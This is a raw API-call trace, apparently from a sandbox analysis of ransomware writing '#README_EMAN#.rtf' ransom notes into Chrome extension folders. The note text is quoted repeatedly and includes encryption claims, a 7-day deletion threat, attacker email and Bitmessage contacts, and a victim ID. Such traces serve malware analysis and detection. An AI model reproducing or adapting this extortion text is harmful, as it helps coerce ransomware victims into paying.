th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.753] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.754] CloseHandle (hObject=0x294) returned 1 [0297.754] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#readme_eman#.rtf")) returned 0x20 [0297.754] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\#readme_eman#.rtf")) returned 0xffffffff [0297.754] GetLastError () returned 0x2 [0297.754] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 